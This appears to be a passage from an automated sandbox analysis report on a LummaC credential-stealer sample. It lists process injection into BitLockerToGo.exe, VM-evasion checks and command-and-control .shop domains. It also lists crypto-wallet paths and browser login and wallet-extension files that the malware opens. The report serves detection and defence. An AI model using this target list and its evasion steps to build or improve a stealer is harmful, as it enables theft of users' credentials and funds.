              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: file.exeStatic file information: File size 9048064 > 1048576
              Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3a5e00
              Source: file.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x445800
              Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: file.exe, 00000000.00000002.2354687188.000000C0002EC000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C0001D7000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C000212000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342735024.000001E6FBA50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: file.exe, 00000000.00000002.2354687188.000000C0002EC000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C0001D7000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C000212000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342735024.000001E6FBA50000.00000004.00001000.00020000.00000000.sdmp
              Source: file.exeStatic PE information: section name: .xdata
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D31CCA pushfd ; retf 5_2_02D31CD1
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 1768Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5388Thread sleep time: -30000s >= -30000sJump to behavior
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: BitLockerToGo.exe, 00000005.00000002.2531924515.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.2531924515.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005268000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: file.exe, 00000000.00000002.2355600805.000001E6D4DD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: BitLockerToGo.exe, 00000005.00000002.2531924515.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWi]
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D28E70 LdrInitializeThunk,5_2_02D28E70

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CF0000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CF0000 value starts with: 4D5AJump to behavior
              LummaC encrypted strings found
              Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: demonstationfukewko.shop
              Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: liabilitynighstjsko.shop
              Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: alcojoldwograpciw.shop
              Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: incredibleextedwj.shop
              Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: shortsvelventysjo.shop
              Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: shatterbreathepsw.shop
              Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tolerateilusidjukl.shop
              Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: productivelookewr.shop
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CF0000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: A23008Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7060, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: BitLockerToGo.exe, 00000005.00000002.2531924515.0000000002E93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: MiOoaQbCwVRxfJcnwQBVQAJCvyPEJWQdURbufaRDGZmblicvqTnbSxrEmpUnCeUsCdBQozPJWsYKoPDbfqlRvUUyqDTovvNjNjNfgObhOQpauDXfROlelpGCZbwjEquQcWQEvcVrvDGpPskzeUbJfBLStHUsSLppQlerEymraBpTmKBjzFSsmjNOLLhjsaKVKeiqtVtqzXWRXaOaasQWcgvoUrCyoIUqzMjOTRMvKwZSwfxefwMdekKPxUWUeuMbhPxMRLjAxxPAGobEIWgebEsXDFwewkfpzcTbjpsLgfgTeudESshSsBAFOKkcuYgFpAllqTDnoveNRQFswFIZuZvJtKCKSyDUngBdjHtcPiDnKilFiPAaNVKRuvGszqBFGINNRjzEJOTMRzxwpHoEzUSgxykAAiMfzaJsLVlWYEsjRaozqfPTZLgBVIDXYUCmDbgRlDOUDhpFvRiJPSsUeBKCiPulYlxwnPpuPJgwuRfUVizEoonZdIeBKhZAyPbofZhAnTzaKRyvPTlgJakGGARYzgObaKfrhMAuCxzAIYzdfPluENPWxYLxlTEqYLOujXequKlMGpolehAjiWByAYyUqFQkThkUAkTkQXCuFNKHVVnZLPErEvkqAFonkBlgxjLhbgzSQHYSAeoRyTJiMKOLwEDXRLtCAtaDFpDOzYKaqekuYmRGnFVBcuvNEhMEIFNxIbuVrNlXByBVaqgrhtHNyBTwxrjkhhZpXavggqHMDLLBSobXycBbepMzFMyqrsGRZSZHFCaOlBABvArWmCjkouCQwAPxNtrfeBQrxYYncrnIJAlDcYotukZNLZfKgNCkNkuwUMnDwwswtxaLdfblGfLVGsiHBGJVLJzyrgIYyVoTsipwPiVHZbRhRCMpbgQNGXhTwjatjogFahDekenPfDKttjlDUJfZcqAFJArvNYdPJKtufbZybbIDyTBaBAqDoiHLlGHfxrMUtKGctUSPSYfmQEdJgqGAdGASeTomVVNbuwLyjsgSgSRiVRtMCCjNSKBbhYafAwNqwgOGeguxSiABIqOGeCsebbwpTgZAkEMgpfQvGOeBISjzzzNAaBwCmKullzHxylEWZtoiTtnHfvnMsyKxXBAPECHocecBPtztknmRvDHAFHJIJgmXiTfuwokDizHWWcXTdtcQMUusMaABHAlRDexXrwQwHuPqcTsuAYKhAckRkzmMeAugCDVLUHXglMIgaoSOQfuxZabKTATujJyLFHukiuplYRtFTGYeDPyslRUWxHsHYQZPuuCrONJFsRTJPHmTBVjxtONEvCMhmObYWLfxjyDLkdHEZLNOWkTzyJqVspDYRtrvoovOwbwMtqEokMbGrcyVFpnbAzZmLWBVpFNobuDSjHkanvZgApZNsqoyIhxzEgQnNBsqVOwHyDVMBWOVaVxhsmIEpJOsyEpFihDsCJSRfaEXXZyEpEQcEUHZBVpvJkdwaLTYRaAdzSyLHVWNpuCnvPQXKFvcJpDwVivCugUxTvwEkRoyTioFQYMuOlkoOeLTpkrAknYDZqEIhEiJAOrHUplmjbuUCqIpuuzxhDcBkdkLzAJvIfOyTbPwmSRyjEvUGfnXHAevqiCavEvMuaNFIewCFkabIDbfiBPrhIrXadEclzPADeORWvSvCmLSqEbeISubqqhKhkHHGSmIVfzZHBpezkdumpZOwxyKupxvGWgOEdApBxSxLQqXmsoyvIZwIsWXhOjmFEZGqKgnKPfpdbcILjBKRUTeHuOYCGsZYreTHGijrzYhxqzGauWdeYJSfSIFbjvtOfBnJJyNRaURCXfjFldJjCnLOYblQRYZAuiXiXfauqRbyjPxEFauuzmQEEpyvjOqohxKGhIAJexaqBxdEJrcRvuQgWTeUTmOtzTQJUxDbTALIxmNzokQRmxLmJdXqzJFakQKgeUARerumHNAZKjbbXQBXSUxDFoJXGaPgPxqQVUGCjSAUGLSnIYQxonTRplchwUeUWqzLIIQPXPtWdGfMJAvrcIaFzIBNGydHirTCfeglNNkIoKCyWOrqVRBsphgigTUEDeBYVVPzlizRGdNZNgbzLBLtFahcdymgfqefqlxbjPlEVwtmMWCjrSOisilTaMlllYHBSkgxhDf
              Source: BitLockerToGo.exe, 00000005.00000002.2531924515.0000000002E93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: BitLockerToGo.exe, 00000005.00000003.2398752168.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb391
              Source: BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance88+X
              Source: BitLockerToGo.exe, 00000005.00000002.2531924515.0000000002E93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: BitLockerToGo.exe, 00000005.00000003.2470610228.0000000002EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: BitLockerToGo.exe, 00000005.00000003.2470610228.0000000002EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
